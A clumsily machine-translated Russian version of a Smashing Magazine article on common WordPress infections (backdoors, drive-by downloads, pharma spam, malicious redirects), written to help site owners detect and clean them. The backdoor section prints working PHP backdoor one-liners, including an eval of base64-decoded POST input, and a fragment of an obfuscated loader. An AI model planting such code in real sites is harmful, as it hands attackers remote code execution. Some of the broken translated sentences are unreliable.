Общие WordPress вредоносных инфекций

WordPress безопасности является серьезным бизнесом. Использование уязвимостей в архитектуре WordPress привело к массовым компрометациям серверов через перекрестное загрязнение. Расширяемость WordPress повышает его уязвимость; плагины и темы дома недостатки логики, лазейки, пасхальные яйца, бэкдоры и множество других вопросов. Стрельба ваш компьютер, чтобы найти, что вы поддерживаете случайные причины или продажи Виагра может быть разрушительным.

wordpress malware

В ядре WordPress все вопросы безопасности быстро решаются; Команда WordPress ориентирована на строгое поддержание целостности приложения. То же самое, однако, не может быть сказано для всех плагинов и тем.

Дальнейшее чтение на SmashingMag:

В центре внимания этой должности не добавить к подавляющему числу WordPress безопасности или WordPress закаливания должности, которые вы видите плавающие вокруг Интернета. Скорее, мы предоставим больше контекста о вещах, вам нужно, чтобы защитить себя от. Какие хаки являются WordPress пользователи особенно уязвимы для? Как они попадают? Что они делают с сайтом WordPress? В этой длительной статье, мы рассмотрим бэкдоры, диск-по загрузки, фарма взломать и вредоносных перенаправлений. Обратите внимание, что некоторые антивирусные приложения сообщают об этой статье как о вредоносном ПО, вероятно, потому, что она содержит примеры кода, которого следует избегать. Эта статья не содержит никаких вредоносных программ себя, так что оповещение должно быть основано на эвристическом анализе.

За последние два года веб-вредоносные программы выросли примерно на 140%. В то же время, WordPress взорвалась в популярности в качестве блогов платформы и CMS, питание около 17% веб-сайтов сегодня. Но эта популярность имеет свою цену; это делает WordPress мишенью для веб-вредоносных программ. Почему? Просто: его охват дает возможность для максимального воздействия. Конечно, популярность это хорошо, но это также делает нас WordPress пользователей уязвимы.

Немного о нашем эксперте по безопасности: Познакомьтесь с Тони

Не имея технических знаний, необходимых для того, чтобы углубляться, я привел на борт соавтора, чтобы помочь мне. Приведение технической информации Тони Перес, главный операционный и финансовый директор Sucuri безопасности. Sucuri Security предоставляет услуги обнаружения, оповещения и исправления для борьбы с вредоносными программами на основе Интернета. Другими словами, он работает на веб-сайтах, которые были скомпрометированы. Это означает, что Тони имеет фон, статистика и, самое главное, знания, чтобы пойти действительно в глубину по вопросам вредоносных программ, которые влияют на пользователей WordPress.

Я спросил Тони, как он попал в веб-безопасности:

Tony«Я думаю, что это восходит к 2009 году. Я управлял и проектировал крупномасштабные корпоративные решения для клиентов Министерства обороны (DOD) и путешествовал по миру. В ходе этого процесса существовала небольшая вещь, называемая соблюдением Руководства по техническому осуществлению безопасности (STIG), изложенного Агентством оборонных информационных систем (DISA). Я знаю, глоток, но это, как мы сделали вещи в МО; если у него не было аббревиатуры, он не принадлежал.

Это, как говорится, он не был до тех пор, пока я присоединился Dre и Даниэль на Sucuri безопасности, в начале 2011 года, что я действительно начал получать то, что я считаю каких-либо сходство InfoSec отбивные «.

Вооружившись техническими знаниями Тони, мы рассмотрим основные вопросы, которые влияют на пользователей WordPress сегодня. Но прежде чем мы вникаем в подробности, давайте посмотрим на некоторые из причин, почему WordPress пользователи могут быть уязвимы.

Что делает WordPress уязвимым?

Вот простой ответ. Старые версии WordPress, наряду с темой и плагин уязвимости, умножается на популярность CMS, с конечным пользователем бросили в смеси, сделать для уязвимых веб-сайт.

Давайте разобьем это.

Первый выпуск устаревших версий WordPress. Всякий раз, когда новая версия WordPress выпущен, пользователи получают нытье сообщение, но много пользователей получили очень хорошо игнорировать пилить. Основные уязвимости сами по себе редко являются проблемой. Они существуют; доказательство можно найти в последних 3.3.3 и 3.4.1 релизов. WordPress ‘основной команды получил довольно хорошо в развертывании патчи безопасности быстро и эффективно, так что риск эксплуатации является минимальным, при условии, что WordPress пользователи обновляют их установки. Это, к сожалению, суть проблемы: WordPress пользователи игнорируют сообщение. И это не только неопытные и случайные пользователи WordPress, которые не обновляются. Недавний громкий хак был на сайте Reuters, который был запущен версия 3.1.1 вместо текущего 3.4.1.

Уязвимости в плагинах и темах является еще одной проблемой. Хранилище WordPress имеет 20000 плагинов и растет. Плагины разного качества; некоторые из них неизбежно имеют лазейки в плане безопасности, в то время как другие устарели. Кроме того, рассмотреть все темы и плагины за пределами репозитория, в том числе коммерческих продуктов, которые распространяются бесплатно на веб-сайтах Warez и упакованы с вредоносными программами. Google является нашей любимой поисковой системы, но это не так жарко для поиска качества WordPress темы.

Тогда, есть популярность. WordPress пользуется популярностью,без сомнения. Около 700 миллионов веб-сайтов были записаны как с помощью WordPress в мае этого года. Эта популярность означает, что если хакер может найти способ в один сайт WordPress, они потенциально миллионы веб-сайтов для детской площадки. Они не должны взломать веб-сайты, которые используют текущую версию WordPress; они могут сканировать для веб-сайтов, которые используют старые небезопасные версии и взломать их.

Наконец, и самое главное, самым большим препятствием, стоящим перед пользователями WordPress, являются они сами. Тони, по его собственным словам:

«По какой причине, есть такое восприятие среди пользователей WordPress, что самая трудная часть работы была платить кому-то построить веб-сайт, и что как только его построили, вот и все, это сделано, никаких дальнейших действий требуется. Может быть, так было семь лет назад, но не сегодня.WordPress ‘простота использования является удивительным, но я думаю, что она обеспечивает ложное чувство гарантий для конечных пользователей и разработчиков, так. Я думаю, однако, это восприятие начинает меняться «.

Из опыта Тони в Sucuri Security, наиболее распространенными уязвимостями для эксплойтов веб-сайта являются:

  • Устаревавая программное обеспечение,
  • Плохое управление полномочиями,
  • Плохое системное администрирование,
  • Суп-кухня серверов,
  • Отсутствие знаний в Интернете,
  • Угловая резка.

Немного времени и образования все, что нужно, чтобы исправить эти проблемы и сохранить ваш сайт WordPress в безопасности. Это означает не только обеспечение того, чтобы вы, как эксперт WordPress образованы, но обеспечение того, чтобы клиенты вы передать веб-сайты, а также.

Эволюция атак

По мере развития Интернета, природа взлома развивалась вместе с ним. Взлом начался как совсем другое животное. Назад в день, речь шла о показе вашей технической доблести, манипулируя веб-сайт, чтобы делать вещи за пределами намерений веб-мастеров; это часто было политически мотивировано. Однажды вы проснетесь и окажетесь в поддержке оппозиции в Нигерии или Либерии. В эти дни, взлом это все о деньгах. Недавнее вредоносное ПО DNSChanger (например, атака «Интернет Судного дня»), например, позволило хакерам загребать почти 14 миллионов долларов, прежде чем быть остановленными ФБР и эстонской полицией в ноябре прошлого года.

Еще одна технология взлома, которая возникла является malnets. Эти распределенные сети вредоносных программ используются для всего, включая выявление краж, DDoS-атак, распространение спама, загрузку, поддельные AV и так далее. Хакеры автоматизируют свои атаки для максимальной экспозиции.

Автоматизация с помощью ботов не является их единственным механизмом. Сегодня у вас также есть автоматизация вредоносных программ: использование инструментов для быстрого создания полезной нагрузки (т.е. инфекции), что позволяет злоумышленнику сосредоточиться строго на получении доступа к окружающей среде. Как только хакер имеет доступ к среде, они копируют и вставить в автоматической полезной нагрузки. Одним из наиболее распространенных инструментов автоматизации является Blackhole Exploit Kit. Этот и многие другие комплекты можно приобрести онлайн за символическую плату. Эта плата покупает услуги по поддержанию и держит комплект обновляется с новыми инструментами для последних уязвимостей. Это настоящее предприятие.

Общие WordPress вредоносных проблем

Тысячи типов вредоносных программ и инфекций активны в Интернете; к счастью, не все относятся к WordPress. Для остальной части этого поста, мы будем смотреть на четыре из наиболее распространенных атак на WordPress пользователей:

Бэкдор

Бэкдор позволяет злоумышленнику получить доступ к вашей среде с помощью того, что вы считаете ненормальными методами — FTP, SFTP, WP-ADMIN и т.д. Хакеры могут получить доступ к вашему веб-сайту с помощью командной строки или даже с помощью веб-интерфейса, как это:

backdoor gui screenshot
Бэкдор GUI. Нажмите на изображение для всей картины!

Бэкдоры исключительно опасны. Оставшись без контроля, наиболее опасные могут вызвать хаос на вашем сервере. Они часто объясняются инцидентами загрязнения кросс-сайтов, т.е. когда веб-сайты заражают другие веб-сайты на том же сервере.

Как на меня напали?

Атака часто происходит из-за устаревого программного обеспечения или дыр в безопасности в коде. Уязвимость, хорошо известная сообществу WordPress, была найдена в скрипте TimThumb, который использовался для изображки изображений. Эта уязвимость позволила хакерам загрузить полезную нагрузку, которая функционировала как бэкдор.

Вот пример сканера, который ищет специально уязвимые версии TimThumb:

Screenshot

Как это выглядит?

Как и большинство инфекций, этот может быть закодирован, зашифрован, скрещен или их комбинация. Однако это не всегда так просто, как искать зашифрованный код; Есть несколько случаев, в которых он выглядит как законный код. Вот пример:

Screenshot

Другой пример:

Screenshot

Ниже приводится случай, когда содержание скрыто в базе данных и цели WordPress установок:

return @eval(get_option(’blogopt1’));

А вот очень простой бэкдор, который позволяет любой запрос PHP для выполнения:

eval (base64_decode($_POST["php"]));

Вот пример грязный бэкдор специально ориентации уязвимости TimThumb:

Screenshot

Вот еще один бэкдор, который обычно влияет wordPress установок, Filesman:

Screenshot

Как я могу уговорить, инфицирован ли я?

Задние двери бывают разных размеров. В некоторых случаях бэкдор так же прост, как и изменение имени файла, например:

  • wtf.php
  • wphap.php
  • php5.php
  • data.php
  • 1.php
  • p.php

В других случаях код встраивается в, казалось бы, доброкачественный файл. Например, это было найдено в index.php файле темы, встроенном в законный код:

Screenshot

Задние двери сложно. Они постоянно развиваются, так что нет окончательного способа сказать, что вы должны искать.

Как это предотвратить?

В то время как бэкдоры трудно обнаружить, предотвращение их возможно. Для взлома, чтобы быть эффективным, ваш сайт нуждается в точке входа, которая доступна для хакера. Вы можете закрыть бэкдоры, сделав следующее:

  1. Предотвращение доступа. Сделайте вашу среду труднодоступной. Тони рекомендует трехсторонний подход к wp-admin блокировке:
    • Блок ИС,
    • Двухфакторная аутентификация,
    • Ограниченный доступ по умолчанию. Это сделает его чрезвычайно трудным для тех, кто, кроме вас, чтобы получить доступ к вашему сайту.
  2. Убейте исполнение PHP. Часто самым слабым звеном в любой цепи WordPress является /uploads/ каталог. Это единственный каталог, который должен быть writable в вашей установке. Вы можете сделать его более безопасным, не позволяя кому-либо выносить исполнителя PHP. Это просто сделать. Добавьте следующее в .htaccess файл в корне каталога. Если файл не существует, создайте его.
<Files *.php>
Deny from All
</Files>

Как он очищается?

После того как вы нашли бэкдор, очистка это довольно легко — просто удалить файл или код. Тем не менее, найти файл может быть трудно. На своем блоге, Кантон Беккер дает несколько советов о том, как рыскать ваш сервер для бэкдоров. Существует не серебряная пуля для бэкдоров, хотя, или для любой инфекции — бэкдоры могут быть простыми или сложными. Вы можете попробовать сделать некоторые основные поиски eval и , но если ваш код выглядит как base64_decode то, что ниже, то зная, что искать становится все труднее:

$XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb=’b’.$XZKsyG.
$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$joEDdb(‘ZXZhbChiYXN
lNjRfZGVjb2RlKCJhV1lvYVhOelpY…

Если вы знакомы с терминалом, вы можете войти в свой сайт с помощью SSH и попробовать определенные методы. Самый очевидный и простой способ заключается в том, чтобы искать это:

# grep -ri "eval" [path]

Или для этого:

# grep -ri "base64_decode" [path]

Гарантирует, r что все файлы сканируются, в то время как i гарантирует, что сканирование является нечувствительным к случаям. Это важно, потому что вы можете найти вариации eval : , , или Eval eVal evAl evaL любой другой перестановки. Последнее, что вы хотите, чтобы ваше сканирование не оправдалось, потому что вы были слишком конкретными.

Ищите недавно измененные файлы:

find -type f -ctime -0 | more

-typeИщет файлы и -ctime ограничивает сканирование за последние 24 часа. Вы можете посмотреть на последние 24 или 48 часов, указав -1 или -2 , соответственно.

Другим вариантом является использование diff команды. Это позволяет обнаружить различия между файлами и каталогами. В этом случае вы бы использовали его для каталогов. Для того, чтобы быть успешным, однако, вы должны иметь чистые копии вашей установки и темы. Таким образом, это работает, только если у вас есть полная резервная копия вашего сайта.

# diff -r /[path]/[directory] /[path]/[directory] | sort

-rОпция повторяется во всех каталогах, и sort команда сортирует выход и упрощает чтение. Ключевым моментом здесь является быстрое определение вещей, которые не принадлежат, так что вы можете запустить проверки целостности. Все, что вы найдете, что находится в каталоге живого веб-сайта, но не в каталоге резервного копирования гарантирует второй взгляд.

Драйв-По загрузкам

Загрузка по проезжающих мимо автомобилей — это веб-эквивалент съемки. Технически, это, как правило, встроенные на вашем сайте через некоторый тип инъекции скрипта, которые могут быть связаны с инъекцией ссылки.

Смысл загрузки понажав часто заключается в загрузке полезной нагрузки на локальную машину пользователя. Одна из наиболее распространенных полезных нагрузок информирует пользователя о том, что их веб-сайт был заражен и что они должны установить антивирусный продукт, как показано здесь:

Как происходит атака?

Существует несколько способов, с которыми может попасть атака. Наиболее распространенными причинами являются:

  • Устаревавая программное обеспечение,
  • Компромиссные учетные данные wp-admin (, FTP),
  • Инъекция СЗЛ.

Как это выглядит?

Ниже приведен ряд примеров ссылок инъекций, которые приводят к некоторому типу погона скачать атаки:

Screenshot

И это:

Screenshot

И это:

Screenshot

В последнее время, диск-по загрузки и другие вредоносные программы функционируют в качестве условного вредоносного ПО — разработан с правилами, которые должны быть выполнены до инфекции представляет себя. Подробнее о том, как работает условная вредоносная программа Sucuri, читайте в публикации«Понимание условного вредоносного ПО».

Как я могу уговорить, инфицирован ли я?

Использование сканера, такого как SiteCheck, чтобы узнать, инфицированы ли вы, возможно. Сканеры довольно хорошо собирание ссылки инъекций. Еще одна рекомендация состоит в том, чтобы подписаться на Google Webmaster Tools и проверить свой веб-сайт. В случае, если Google собирается черный список вашего сайта, он будет по электронной почте вам заранее уведомив вас о проблеме и дает вам возможность исправить ее. Бесплатная услуга может выплачивать дивиденды, если вы хотите оставаться активным.

Вне использования сканера, трудность в выявлении инфекции будет зависеть от его сложности. Когда вы смотрите на сервер, он будет выглядеть примерно так:

Screenshot

Хорошей новостью является то, что такая инфекция должна быть где-то, где внешний выход генерируется. Следующие файлы являются общими местами, где вы найдете ссылку инъекций:

  • wp_blog_header.php(основной файл)
  • index.php(основной файл)
  • index.php(тематический файл)
  • function.php(тематический файл)
  • header.php(тематический файл)
  • footer.php(тематический файл)

Около 6 раз из 10, инфекция будет в одном из этих файлов. Кроме того, ваше антивирусное программное обеспечение может обнаружить полезную нагрузку снижается на ваш компьютер, когда вы посещаете ваш сайт — еще одна веская причина для запуска антивирусного программного обеспечения локально.

Sucuri также нашел ссылку инъекции встроенных в сообщения и страницы (в отличие от исходного файла PHP), а также в текстовых виджетов. В таких случаях вычищайте базу данных и пользователей, чтобы убедиться, что ни одна из ваших учетных записей не была скомпрометирована.

Как он очищается?

Очистка может быть сложной задачей и будет зависеть от вашего технического мастерства. Вы можете использовать терминал, чтобы найти проблему.

Если у вас есть доступ к серверу через SSH, вам повезло. Если вы этого не сможете, вы всегда можете скачать локально. Вот команды, которые будут наиболее использовать для вас при прохождении терминала:

  • CURLИспользуется для передачи данных с синтаксисом URL.
  • FINDПоиск по имени файла или каталога.
  • GREPПоиск содержимого в файлах.

Например, чтобы найти все файлы для определенного раздела инъекции, попробуйте что-то вроде этого:

$ grep -r "http://objectcash.in" .

Важно включить следующие символы:

  • "Поддерживает целостность поиска. Использование его важно, когда вы ищете специальные символы, потому что некоторые символы имеют другое значение в терминале.
  • -rОзначает «рекурсивный» и будет пересекать все каталоги и файлы.

Вы также можете уточнить поиск по типу файла:

$ grep --include ".php" -r "http://objectcash.in" .

Включение –include опции позволяет указать тип файла; в данном случае только файлы PHP.

Это всего лишь несколько трюков. После того как вы обнаружили инфекцию, вы должны убедиться, что вы удалите каждый экземпляр его. Оставив только один может привести к серьезным разочарованием в будущем.

Фарма Hack

Фарма рубить является одним из наиболее распространенных инфекций вокруг. Его не следует путать с вредоносными программами; это на самом деле классифицируется как спам — «глупые бессмысленные раздражающие сообщения». Если установлено, что вы распространяете спам, вы рискуете быть помечены Google со следующим предупреждением:

This site may be compromised!!

Это то, что он будет выглядеть на странице результатов поиска Google (SERP):

Как на меня напали?

Фармацевтическая инъекция спама использует условные вредоносные программы, которые применяются правила к тому, что видит пользователь. Таким образом, вы можете или не можете увидеть страницу выше, в зависимости от различных правил. Это контролируется с помощью кода на сервере, например:

Screenshot

Некоторые инъекции достаточно умны, чтобы создавать свои собственные гнезда в вашем сервере. Инфекция использует $_SERVER[“HTTP_REFERER”] , который перенаправляет пользователя в интернет-магазин, который контролируется злоумышленником для получения дохода. Вот пример такой монетизированной атаки:

Screenshot

Как и большинство спам-инфекций типа, фарма рубить в значительной степени о контроле трафика и зарабатывать деньги. Деньги могут быть сделаны через клик-через и / или трафика. Очень редко делает фармацевтические взломать инъекции перенаправить пользователя на вредоносный веб-сайт, который содержит некоторые дополнительные инфекции, как и с диска по попытке загрузки.

Вот почему это так трудно обнаружить. Это не так просто, как запрос на «Cialis» или «Виагра», хотя это было бы удивительным. Большинство людей будут удивлены числом законных фармацевтических компаний, которые существуют и публиковать объявления в Интернете. Это усугубляет проблему выявления этих инфекций.

Как это выглядит?

Pharma рубить превратилась, что сделало его более трудным для обнаружения. В прошлом, спам инъекции будут появляться на ваших страницах, где они были легко найти и, что более важно, удалить.

Сегодня, однако, фарма рубить совсем другое. Он использует ряд бэкдоров, посыпать интеллектом, чтобы обнаружить, где трафик идет от, а затем он говорит инфекции, как реагировать. Опять же, он может вести себя как условное вредоносное ПО. Все больше и больше, фарма взломать резервы его полезной нагрузки для ботов Google; цель состоит в том, чтобы сделать его на Google выдачи. Это обеспечивает максимальную экспозицию и самую большую денежную отдачу для хакеров.

Вот изображение старой фарма рубить инъекционных спам в блоге теги:

screenshot of a blog's tags with pharma hack tags

Другая версия фарм-хака была введена таким образом, что, когда пользователь нажимает на явно доброкачественную ссылку (например, «Дом», «О» или «Контакт»), он перенаправляет пользователя на совершенно другую страницу. Где-то вроде этого:

Как укажите, инфицирован ли я?

Выявление инфекции может быть очень сложно. В более ранних перестановках выявление инфекции было так же просто, как навигация по вашему веб-сайту, поиск объявлений, ссылок, сообщений и страниц, и быстро ездое определение того, были ли вы инфицированы. Сегодня есть более продвинутые версии, которые труднее найти.

Хорошей новостью для прилежных веб-мастеров является то, что, позволяя некоторый тип аудита или мониторинга файлов на вашем сайте WordPress, вы сможете увидеть, когда новые файлы были добавлены или когда изменения были сделаны. Это, безусловно, один из наиболее эффективных методов обнаружения.

Вы можете попробовать использовать бесплатные сканеры, такие как SiteCheck. К сожалению, многие сканеры HTTP, в том числе Sucuri, борьба с задачей, потому что фарма взломать не является технически вредоносным, так что определение достоверности содержания может быть трудно для сканера.

Как он очищается?

Во-первых, определить зараженных файлов, а затем удалить их. Вы можете использовать команды, которые мы изложили выше, и вы можете сделать запросы на ваш сайт через терминал, чтобы быстро увидеть, служите ли вы какой-либо фарм спам для ваших посетителей.

При борьбе с фармацевтическими хаками, одна из самых полезных команд grep . Например, для поиска любых объявлений или фармацевтических ссылок, помеченных по мечам, запустите:

# egrep -wr 'viagra|pharmacy' .

Используя, egrep мы можем искать несколько слов в то же время, если это необходимо, тем самым экономя время в этом случае.

Или попробуйте что-то вроде этого:

# grep -r "http://canadapharmacy.com" .

Это работает только в том случае, если инфекция не закодирована, зашифрована или не скрещена.

Другим полезным методом является доступ к вашему веб-сайту через различных агентов пользователей и рефереров. Вот пример того, как выглядел один веб-сайт при использовании реферера Microsoft IE 6:

Попробуйте Боты против браузеров, чтобы проверить свой сайт через ряд различных браузеров.

Пользователи терминалов также могут CURL использовать:

# curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" http://somesite.com

Как это предотвратить?

Предотвращение фарма рубить может быть сложно. Sucuri обнаружил, что взломать регулярно использует уязвимые устаревшие программного обеспечения. Тем не менее, ваша устаревая установка WordPress не обязательно является проблемой. Даже если вы в курсе, другая устаревшая установка на том же сервере может быть уязвима для инфекции. Если реальная полезная нагрузка находится в другом месте на вашем сервере, а не в каталоге вашего сайта, то поймать его может быть исключительно трудно.

Вот пример того, что вы могли бы искать, если вы не можете найти инфекцию в вашей собственной установки:

Screenshot

Чтобы предотвратить фарма хак, вы должны сделать две вещи:

  1. Держите ваше программное обеспечение в актуальном состоянии,
  2. Держитесь подальше от суп-кухня серверов.

Вредоносные перенаправления

Вредоносное перенаправление отправляет пользователя на вредоносный веб-сайт. В 2010 году было обнаружено 42 926 новых вредоносных доменов. В 2011 году это число выросло до 55 294. И это просто включает в себя первичные домены, а не все их поддомены.

Когда посетитель перенаправляется на веб-сайт, не основной, веб-сайт может содержать или не содержать вредоносную полезную нагрузку. Предположим, у вас есть веб-сайт myhappysite.com в; когда кто-то посещает его, веб-сайт может принять meansite.com/stats.php посетителя, где вредоносная полезная нагрузка находится в файле этого stats.php веб-сайта. Или это может быть безвредный веб-сайт только с объявлениями и без вредоносных полезной нагрузки.

Как на меня напали?

Как и многие вредоносные атаки, он сводится к доступу. Вредоносное перенаправление может быть сгенерировано бэкдором. Хакер будет сканировать на уязвимость, такие как TimThumb или старые версии WordPress и, когда они находят его, загрузить полезную нагрузку, которая функционирует как бэкдор.

Как это выглядит?

Обнаружение перенаправления не так сложно, как обнаружение некоторых других инфекций. Он часто встречается в файле .htaccess и выглядит примерно так:

Screenshot

Или вот так:

Screenshot

Возможны случаи, когда перенаправление кодируется и находится в одном из файлов PHP. Если это так, то он, как правило, можно найти в header.php footer.php вашем, или index.php файл; он также, как известно, проживают в корневом index.php файле и в других файлах основного шаблона. Он не всегда закодирован, но если это так, это будет выглядеть примерно так:

Screenshot

Как укажите, инфицирован ли я?

Есть несколько способов, чтобы проверить на наличие инфекций. Вот несколько советов:

  • Используйте бесплатный сканер,например SiteCheck. Они очень редко пропускают вредоносные перенаправления.
  • Тест с помощью Ботов против браузера.
  • Слушайте своих пользователей. Возможно, вы не обнаружите перенаправление, но иногда пользователь предупреждает вас об этом.

Если пользователь обнаруживает проблему, задайте ему соответствующие вопросы, чтобы помочь диагностировать проблему:

  • Какую операционную систему они используют?
  • Какой браузер (ы) они используют, и какая версия (ы)?

Чем больше информации вы получите от них, тем лучше вы можете воспроизвести проблему и найти исправление.

Как он очищается?

Вредоносные перенаправления являются одним из самых простых инфекций для очистки. Вот хорошая отправная точка:

  1. Откройте свой .htaccess файл.
  2. Копируйте любые правила переписывания, которые вы добавили сами
  3. Определите любой вредоносный код, как образец выше, и удалите его из файла. Прокрутите весь путь до нижней части, .htaccess чтобы убедиться, что есть какие-либо ошибки директивы, указывающие на ту же инфекцию.

Не забудьте также искать все .htaccess файлы на сервере. Вот один быстрый способ увидеть, сколько существует на вашем сервере:

# find [path] -name .htaccess -type f | wc -l

И это скажет вам, где именно эти файлы:

# find [path] -name .htaccess -type f | sort

Инфекция не всегда ограничивается там, однако. В зависимости от инфекции, вы также можете найти перенаправление закодированы и встроенные в файл, такие как index.php или header.php .

Тревожно, эти инфекции могут реплицироваться во всех ваших .htaccess файлах. Бэкдор, ответственный за него, также может быть использован для создания нескольких .htaccess файлов во всех ваших каталогах, все с той же инфекцией. Удаление инфекции может чувствовать себя как тяжелая борьба, а иногда очистки каждого файла вы можете найти не достаточно. Есть даже случаи, когда файл создается за пределами веб-каталога. Урок всегда смотрится вне вашего веб-каталога, а также внутри него.

Как это предотвратить?

Быстрый и простой метод — изменить право собственности на файл или уменьшить разрешения файла, чтобы только владелец имел разрешение на его изменение. Однако, если ваша корневая учетная запись скомпрометирована, это не будет вам много пользы.

Самый важный файл, чтобы заботиться о это .htaccess . Проверьте учебник «Защитите свой WordPress сайт с .htaccess» для советов по этому вопросу.

Заключение

Там у вас есть: четыре распространенных атак, которые вызывают хаос во многих установках WordPress сегодня. Вы не можете чувствовать себя лучше, если вы получите взломали, но, надеюсь, с этой немного знаний, вы будете чувствовать себя более уверенно, что взломать может быть очищен, и что ваш сайт может быть возвращен к вам. Самое главное, если вы берете одну вещь от этого: всегда держать WordPress обновляется.

Тони Топ Десять Советы по безопасности

  1. Избавьтесь от общих учетных записей и узнайте, кто получает доступ к вашей среде.
  2. Закалите свои каталоги так, чтобы злоумышленники не могли использовать их против вас. Убейте исполнение PHP.
  3. Храните резервную часть; вы никогда не знаете, когда вы будете нуждаться в нем.
  4. Подключитесь безопасно к серверу. Предпочтительнее SFTP и SSH.
  5. Избегайте суп-кухня серверов. Сегмент между разработкой, постановкой и производством.
  6. Оставайтесь в курсе с вашим программным обеспечением — все это.
  7. Убейте ненужные учетные данные, в том числе для FTP, wp-admin и SSH.
  8. Вам не нужно писать сообщения в качестве администратора, и не все должны быть администратором.
  9. Если вы не знаете, что вы делаете, использовать управляемый WordPress хостинг-провайдера.
  10. Фильтрация IP- исправных данных — Двухфакторная аутентификация — Сильные учетные данные — Безопасный доступ

Тони Самые полезные плагины безопасности

  • Сукури Sitecheck вредоносный сканер Этот плагин от Тони и экипажа Sucuri позволяет полное вредоносное ПО и черный список сканирования в WordPress приборной панели, и она включает в себя мощный веб-приложение брандмауэр (WAF).
  • Ограничьте попытки входа Ограничивает количество попыток входа, возможного как с помощью обычного входа, так и с помощью файлов cookie auth.
  • Двухфакторная аутентификация Этот плагин обеспечивает двухфакторную аутентификацию Duo, используя такую услугу, как обратный вызов или SMS-сообщение.
  • Тема-Проверка Проверьте вашу тему, чтобы убедиться, что это до спецификации со стандартами обзора темы.
  • Plugin-Check ли то, что Тема-Check делает, но для плагинов.

Инструменты безопасности

Ресурсы безопасности

Полезные статьи безопасности

Источник: smashingmagazine.com

Великолепный Журнал

Великолепный, сокрушительный, разящий (см. перевод smashing) независимый журнал о веб-разработке. Основан в 2006 году в Германии. Имеет няшный дизайн и кучу крутых авторов, которых читают 2 млн человек в месяц.

Добавить комментарий

%d такие блоггеры, как: